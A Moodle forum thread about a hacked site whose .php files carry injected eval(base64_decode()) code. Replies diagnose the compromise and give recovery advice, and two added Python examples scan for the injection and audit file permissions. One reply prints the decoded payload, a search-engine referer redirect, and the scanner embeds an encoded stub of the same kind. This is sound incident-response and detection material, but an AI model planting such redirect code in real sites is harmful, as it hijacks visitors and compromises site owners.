My site is listed as suspicious site !! help mee

by eda karacelebi -
Number of replies: 6

Hello everyone,

On my Moodle web site, this is the third time Google has listed my site as blacklisted. And again, this is the third time that, when I analyze my site, I have discovered that in my .php files there is this code: "  eval(base64_decode("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"));"

When I delete this code, the problem disappears. But for instance today, I have been doing this job for 6 hours! This is very crazy work! I want to stop this error. Do you have any idea? On my site there are also Joomla and WordPress installed. All these applications are open source systems. So is that the reason for this?

In reply to eda karacelebi

Re: My site is listed as suspicious site !! help mee

by Howard Miller -
Unfortunately, you have been hacked...

Read: http://docs.moodle.org/20/en/Hacked_site_recovery

Then do what this says: http://docs.moodle.org/20/en/Security

Essentially, the permissions on your Moodle files are too lax. They are writable by the web server user, which is a bad thing. You should really just replace the code with a newly downloaded version. It's the only safe way (and fix the permissions).
Average of ratings: Useful (2)
In reply to eda karacelebi

Re: My site is listed as suspicious site !! help mee

by Alex Walker -

Howard's totally right. I've run the string you posted through a base64 decoder, and it comes out as this:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"twitter") or stristr($referer,"yahoo")
or stristr($referer,"google") or stristr($referer,"bing")
or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")
or stristr($referer,"facebook")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://****removed****.pl/");
		exit();
	}
}
}

This is classic search engine hijacking. It's designed to detect search engines (such as Google, Bing, Yahoo) and redirect them to that malicious Polish site.

Check your permissions, as Howard says. Also, make sure all your web applications on this server are up to date. Don't assume this is just a Moodle problem, especially since you're running Joomla and WordPress on the same server. Since these two web applications are so popular, they're very easily hacked and exploited if you don't keep them up to date.
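
The injection pattern quoted in this thread (an eval(base64_decode("...")) blob prepended to .php files) can be hunted for across a document root instead of being found file by file. The following scanner is an added example, not code from the thread or from Moodle; the sample tree it builds is constructed, the redirect hostname in the stub is a placeholder, and the marker strings are taken from the decoded payload shown above.

```python
import base64
import re
import tempfile
from pathlib import Path

# Matches eval(base64_decode("...")) in PHP source, the injection pattern reported in this thread.
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')
# Fragments of the decoded payload that mark the search-engine redirect decoded above.
HIJACK_MARKERS = ("error_reporting(0)", "HTTP_REFERER", 'header("Location:', "header('Location:")

def decode_payloads(php_source):
    """Return [(encoded, decoded)] for every eval(base64_decode(...)) in a PHP source string."""
    hits = []
    for match in EVAL_B64_RE.finditer(php_source):
        encoded = match.group(1)
        try:
            decoded = base64.b64decode(encoded, validate=True).decode("utf-8", errors="replace")
        except ValueError:  # not valid base64: still report it, an analyst should look anyway
            decoded = ""
        hits.append((encoded, decoded))
    return hits

def scan_tree(root):
    """Walk a document root and report every PHP file carrying an eval(base64_decode()) blob."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        for _encoded, decoded in decode_payloads(path.read_text(errors="replace")):
            markers = [m for m in HIJACK_MARKERS if m in decoded]
            findings.append({"file": path.relative_to(root).as_posix(),
                             "markers": markers, "decoded": decoded})
    return findings

# Constructed sample: one clean file and one carrying an encoded redirect stub
# (the hostname is a placeholder, not the one removed from the thread).
CLEAN_PHP = "<?php\nrequire_once('config.php');\necho 'hello';\n"
STUB = ('error_reporting(0);if(stristr($_SERVER["HTTP_REFERER"],"google")){'
        'header("Location: http://redirect.invalid/");exit();}')
INFECTED_PHP = "<?php\neval(base64_decode(\"%s\"));\nrequire_once('config.php');\n" % (
    base64.b64encode(STUB.encode()).decode())

def demo():
    """Build the constructed tree in a temp dir, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "index.php").write_text(CLEAN_PHP)
        (root / "lib" / "setup.php").write_text(INFECTED_PHP)
        return scan_tree(root)
```

Run scan_tree() against a copy of the web root; a hit whose decoded text carries the referer and Location markers is the hijack shown above, and any other hit still deserves a manual look.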

In reply to Alex Walker

Ynt: Re: My site is listed as suspicious site !! help mee

by eda karacelebi -

Thank you so much to both of you. I am not knowledgeable about the code. I am new to Moodle and open source systems. I just opened my .php files and deleted this code. Then I changed my FTP password and my Moodle, WordPress and Joomla passwords. My hosting service is GoDaddy, and on GoDaddy's update page I can automatically update the applications, but I am anxious about whether, if I update my system, they will still work. For instance, my Moodle version is 1.9.9 and if I update it, it will be 1.9.10. Will I lose data? Because nearly 2000 students are still doing homework through Moodle. What do you advise me? When we do the update, will I lose data?

And secondly, when you say "check your permissions", is it about the roles in Moodle? I am the only admin and students have the student role, which is very limited.

I am sorry if I ask odd questions, but as I said, I am not a professional and I am waiting hopefully for your answer.

Thanks

In reply to eda karacelebi

Re: Ynt: Re: My site is listed as suspicious site !! help mee

by Howard Miller -
Did you read the links I sent you? There are some important points...

1. Do NOT just delete the code. Remove ALL the Moodle code and replace it with newly downloaded code (from this site). You are not touching your database or your moodledata folder, so you are safe. Just keep the config.php file for re-use, making sure it is clean.

2. To run a public website you HAVE to understand server file permissions. This has nothing whatever to do with Moodle; it is what happens when you do not lock down web programs properly. As I don't know anything about GoDaddy, I would recommend that you ask their support people what the best settings are. I'm sure this is a common question.
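
The permission problem Howard describes in both of his replies (Moodle code files that the web server account can write to) can be checked mechanically. The audit below is an added example, not Moodle's own tooling or anything from the thread; it flags files that are world-writable, group-writable for the web server's group, or owned by the web server user, and the demo tree is constructed so that it runs without root (it treats our own group as the web server group and a uid that is not ours as the web server uid).

```python
import os
import stat
import tempfile
from pathlib import Path

def audit_permissions(code_root, web_uid, web_gid):
    """Flag entries under a code tree that the web server account could modify."""
    findings = []
    for path in sorted(Path(code_root).rglob("*")):
        st = path.lstat()
        if stat.S_ISLNK(st.st_mode):  # judge the link target where it lives, not the link
            continue
        reasons = []
        if st.st_mode & stat.S_IWOTH:
            reasons.append("world-writable")
        if st.st_gid == web_gid and st.st_mode & stat.S_IWGRP:
            reasons.append("group-writable by web server group")
        if st.st_uid == web_uid:  # an owner can chmod and overwrite its own file
            reasons.append("owned by web server user")
        if reasons:
            findings.append((path.relative_to(code_root).as_posix(), reasons))
    return findings

def demo():
    """Constructed tree: one correctly locked file and two the web server could overwrite.

    web_gid is our own group and web_uid a value that is not ours, so this runs without
    root; on a real host pass the uid/gid of the httpd/apache/www-data account instead.
    """
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "lib").mkdir()
        (root / "lib").chmod(0o755)
        (root / "config.php").write_text("<?php // clean\n")
        (root / "config.php").chmod(0o644)          # owner-only write: fine
        (root / "index.php").write_text("<?php // clean\n")
        (root / "index.php").chmod(0o664)           # group write: flagged
        (root / "lib" / "setup.php").write_text("<?php // clean\n")
        (root / "lib" / "setup.php").chmod(0o666)   # world write: flagged
        return audit_permissions(root, web_uid=os.getuid() + 1, web_gid=os.getgid())
```

Note that moodledata is meant to be writable by the web server, so run this over the code directory only.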
In reply to Howard Miller

Ynt: Re: Ynt: Re: My site is listed as suspicious site !! help mee

by eda karacelebi -

Thank you Howard; I have 3 more Moodles that I use for testing things. I mean no one uses these Moodles. I tried to do the update by using the panel in GoDaddy, but for two days I couldn't open the Moodles. So I am still afraid of updating my active Moodle because I have over 1500 active users. In your post, you wrote about replacing the code with the new code. Can you please give me the link to download the code?

For the server permissions, I sent an e-mail to GoDaddy and wrote about the firewall settings as you sent me in the links. I am waiting for the reply. I will inform you about the reply.

And lastly, there are the links with problems on my site. They are like

/groups/george+w+bush  

/groups/monday+night+football

/index.php?option=com_content&view=article&id=63&Itemid=84

But my Moodle is installed in the www.terakki.net/tmoodle directory. So isn't there a problem on my Moodle?

In reply to eda karacelebi

Re: Ynt: Re: Ynt: Re: My site is listed as suspicious site !! help mee

by Iñaki Arenaza -
The last link you show is a Joomla link (and the other two could be either WordPress or Joomla links, as Moodle doesn't have a '/groups' subdirectory).

I know for a fact that WordPress has lots of security issues and you have to keep it up to date, regularly installing the latest versions (they don't fix the security problems in previous versions; they tell you to upgrade to the latest version). And many of them have been serious security issues that could be used to infect other software installed on your web site (like Joomla and Moodle in your case).

Joomla is less problematic than WordPress, but it's had its share of security problems as well (just like Moodle; no software is perfect).

So you should also check your WordPress and Joomla installs (the core program, and any additional plugins or themes you have installed).

Saludos.
Iñaki